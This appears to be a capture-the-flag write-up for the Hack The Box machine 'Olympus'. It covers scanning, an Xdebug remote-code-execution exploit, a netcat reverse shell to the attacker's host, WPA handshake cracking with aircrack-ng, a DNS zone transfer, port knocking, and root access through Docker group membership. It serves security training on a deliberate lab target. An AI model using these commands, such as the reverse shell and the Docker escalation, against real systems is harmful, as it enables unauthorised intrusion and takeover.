Enumeration
I started off with a simple NMAP scan on the target.
nmap -sV -sS 10.10.10.83
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-13 04:11 AEST
Nmap scan report for 10.10.10.83
Host is up (0.33s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain (unknown banner: Bind)
80/tcp open http Apache httpd
2222/tcp open ssh (protocol 2.0)
A quick glance at the the open ports show nothing too unusual, except maybe the ssh port open on 2222. I navigated to the http service and all it contained was a simple image.
I also decided to run a nikto scan to see if there was something that I was missing.
nikto -h 10.10.10.83
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.83
+ Target Hostname: 10.10.10.83
+ Target Port: 80
+ Start Time: 2018-05-13 05:59:46 (GMT10)
---------------------------------------------------------------------------
+ Server: Apache
+ Uncommon header 'xdebug' found, with contents: 2.5.5
Xdebug is a debugger and profiler tool for php and it was found on our web server. A quick google showed me a Metasploit module which was available for the version found but I was unable to get it working. I found numerous versions of an exploit for ‘Xdebug 2.5.5‘ but it also did not work successfully. Both exploits seemed to return a timeout error message. I later found out that this was due to a connection issue, my location (Australia) was too far from the server hosting the Olympus machine and this was the reason for the exploit failing. I loaded up an Ubuntu instance using DigitalOcean located in America and ran the script again.
python3 exp.py -t http://10.10.10.83/index.php -c 'shell_exec('id');'
[+] Recieve data: <?xml version="1.0" encoding="iso-8859-1"?>
<response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="eval" transaction_id="1"><property type="string" size="54" encoding="base64"><![CDATA[dWlkPTMzKHd3dy1kYXRhKSBnaWQ9MzMod3d3LWRhdGEpIGdyb3Vwcz0zMyh3d3ctZGF0YSkK]]></property></response>
[+] Result: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Success! I quickly made a reverse shell back to my Kali Linux machine.
python3 exp.py -t http://10.10.10.83/index.php -c 'shell_exec("nc -e /bin/sh 10.10.14.2 9000");'
[+] Recieve data: <?xml version="1.0" encoding="iso-8859-1"?>
<response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="eval" transaction_id="1"><property type="null"></property></response>
[-] No result...
My happiness died down quickly because I couldn’t find a user flag in our usual locations. Instead, I discovered the following files:
-rw-r--r-- 1 zeus zeus 297711 Apr 8 00:58 airgeddon.sh
-rw-r--r-- 1 zeus zeus 3283 Apr 8 00:58 Dockerfile
============================================================
-rw-r--r-- 1 zeus zeus 297917 Apr 8 12:48 captured.cap
-rw-r--r-- 1 zeus zeus 57 Apr 8 17:30 papyrus.txt
Airgeddon is primarily used to perform audits on wireless networks. Also, we found a Dockerfile which made me think that we are currently inside of a Docker instance which would explain the multiple SSH ports found on the Nmap scan.
Inside of the papyrus.txt file was:
cat papyrus.txt
Captured while flying. I'll banish him to Olympia - Zeus
I then retrieved the capture file and opened it up in Wireshark. The only thing that I could discover from the capture file was:
SSID=Too_cl0se_to_th3_Sun
After some research, I learned how to crack capture files and passwords using aircrack. I passed in rockyou and let it run for a couple of minutes.
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
Aircrack-ng 1.2 rc4
[00:37:19] 5306024/9822768 keys tested (2661.01 k/s)
Time left: 28 minutes, 17 seconds 54.02%
KEY FOUND! [ flightoficarus ]
Master Key : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48
Transient Key : 46 7D FD D8 1A E5 1A 98 50 C8 DD 13 26 E7 32 7C
DE E7 77 4E 83 03 D9 24 74 81 30 84 AD AD F8 10
21 62 1F 60 15 02 0C 5C 1C 84 60 FA 34 DE C0 4F
35 F6 4F 03 A2 0F 8F 6F 5E 20 05 27 E1 73 E0 73
EAPOL HMAC : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38
I then tried to ssh into both ports 22 and 2222 using the credentials discovered but was again disappointed because it did not work. I tried roughly 30 different combinations of passwords based off Greek mythology which all failed to grant me access. Almost defeated, I tried one last set of combination….
ssh [email protected] -p 2222
I then tried using the SSID as the password…. and IT WORKED. I navigated to the user directory as soon as possible and was once again disappointed and maybe slightly devastated to find that there was NO user flag but instead in its place I found:
-rw-r--r-- 1 root root 85 Apr 15 21:50 help_of_the_gods.txt
...
cat help_of_the_gods.txt
Athena goddess will guide you through the dark...
Way to Rhodes...
ctfolympus.htb
I ran my usual enumeration on the machine and wasn’t able to find anything interesting. I re-read the message and the phrase ctfolympus.htb reminded me of something I did in another box Aragog where I had to add it to the hosts file and was able to route my traffic to a WordPress blog.
root@kali:~/Desktop/HackTheBox# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.83 ctfolympus.htb # added
I quickly added this to my hosts file and tried to browse the page but was greeted by the web-page with the single image (not sure why I was expecting anything else…). An hour of googling and reading other CTF writeups, I decided to try a dns-zone transfer.
root@kali:~/Desktop/HackTheBox# dig -t AXFR ctfolympus.htb @10.10.10.83
; <<>> DiG 9.11.3-1-Debian <<>> -t AXFR ctfolympus.htb @10.10.10.83
;; global options: +cmd
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb. 86400 IN A 192.168.0.120
ctfolympus.htb. 86400 IN NS ns1.ctfolympus.htb.
ctfolympus.htb. 86400 IN NS ns2.ctfolympus.htb.
ctfolympus.htb. 86400 IN MX 10 mail.ctfolympus.htb.
crete.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
mail.ctfolympus.htb. 86400 IN A 192.168.0.120
ns1.ctfolympus.htb. 86400 IN A 192.168.0.120
ns2.ctfolympus.htb. 86400 IN A 192.168.0.120
rhodes.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
www.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 231 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Sun May 25 19:00:00 AEST 2018
;; XFR size: 15 records (messages 1, bytes 475)
The only thing interesting was the line below which I gathered all of my attention to.
ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
After another few hours of struggling and googling methods of temporary ssh methods, I came across the article: How to Use Port Knocking to Hide Your SSH. The article definitely coincided with the TXT record from the zone transfer and I interpreted it as knock on ports 3456 8234 32431 to temporarily open SSH and access the server using “St34l_th3_F1re!”! If you remember, we had a port open on 22 that we haven’t been able to gain access to so after reading about this technique, I was very eager to attempt it.
root@kali:~/Desktop/HackTheBox# knock -v 10.10.10.83 3456 8234 62431
hitting tcp 10.10.10.83:3456
hitting tcp 10.10.10.83:8234
hitting tcp 10.10.10.83:62431
root@kali:~/Desktop/HackTheBox# ssh [email protected]
The authenticity of host '10.10.10.83 (10.10.10.83)' can't be established.
ECDSA key fingerprint is SHA256:8TR2+AWSBT/c5mrjpDotoEYu0mEy/jCzpuS79d+Z0oY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.83' (ECDSA) to the list of known hosts.
[email protected]'s password: St34l_th3_F1re!
Welcome to
) (
( /( ) )\ ) (
)\()) ( /( (()/( ))\ (
((_)\ )(_)) ((_))/((_))\
| |(_)((_)_ _| |(_)) ((_)
| ' \ / _` |/ _` |/ -_)(_-<
|_||_|\__,_|\__,_|\___|/__/
prometheus@olympus:~$ ls
msg_of_gods.txt user.txt
prometheus@olympus:~$ cat msg_of_gods.txt
Only if you serve well to the gods, you'll be able to enter into the
_
___ | | _ _ ._ _ _ ___ _ _ ___
/ . \| || | || ' ' || . \| | |<_-<
\___/|_|`_. ||_|_|_|| _/`___|/__/
<___' |_|
prometheus@olympus:~$ cat user.txt
8a============================19
Privilege Escalation
Once again, I ran my usual enumeration methodologies and was greeted by one piece of interesting information.
prometheus@olympus:~$ groups
prometheus cdrom floppy audio dip video plugdev netdev bluetooth docker
I did not have privileged access BUT I had access to docker commands.
prometheus@olympus:~$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f00ba96171c5 crete "docker-php-entrypoi…" 2 months ago Up 15 minutes 0.0.0.0:80->80/tcp crete
ce2ecb56a96e rodhes "/etc/bind/entrypoin…" 2 months ago Up 15 minutes 0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp rhodes
620b296204a3 olympia "/usr/sbin/sshd -D" 2 months ago Up 15 minutes 0.0.0.0:2222->22/tcp olympia
Interesting. Using the hint from the msg_of_the_gods.txt file, I tried to access the olympia container to get the flag but I was unable to get root on the machine. I then had an idea to use my privileges to duplicate the docker container, mount the root directory at another folder and access the files that way.
prometheus@olympus:~$ docker run -v /root:/tmp/ olympia &
[1] 2452
prometheus@olympus:~$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
97fccbdf5622 olympia "/usr/sbin/sshd -D" 34 seconds ago Up 33 seconds reverent_pare
f00ba96171c5 crete "docker-php-entrypoi…" 2 months ago Up 12 minutes 0.0.0.0:80->80/tcp crete
ce2ecb56a96e rodhes "/etc/bind/entrypoin…" 2 months ago Up 12 minutes 0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp rhodes
620b296204a3 olympia "/usr/sbin/sshd -D" 2 months ago Up 12 minutes 0.0.0.0:2222->22/tcp olympia
prometheus@olympus:~$ docker exec --privileged -it 97fccbdf5622 ls -la /tmp
total 28
drwx------ 4 root root 4096 Apr 15 13:55 .
drwxr-xr-x 1 root root 4096 Jun 26 11:10 ..
-rw------- 1 root root 0 Apr 15 14:20 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 2 root root 4096 Apr 2 20:49 .cache
drwxr-xr-x 2 root root 4096 Apr 15 13:55 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Apr 4 21:00 root.txt
All that was left to do was read the root flag!
(Some time has passed since I have worked on this machine, I have had the privilege of working with Docker and I now realise it would have been easier to just open up a shell on the instance)
prometheus@olympus:~$ docker exec --privileged -it 97fccbdf5622 cat /tmp/root.txt
ab============================03
Overall, this was a really challenging box but I learned alot from it. I learned alot about Docker containers and how they work as well as niche methods such as port knocking and analyzing and cracking capture files.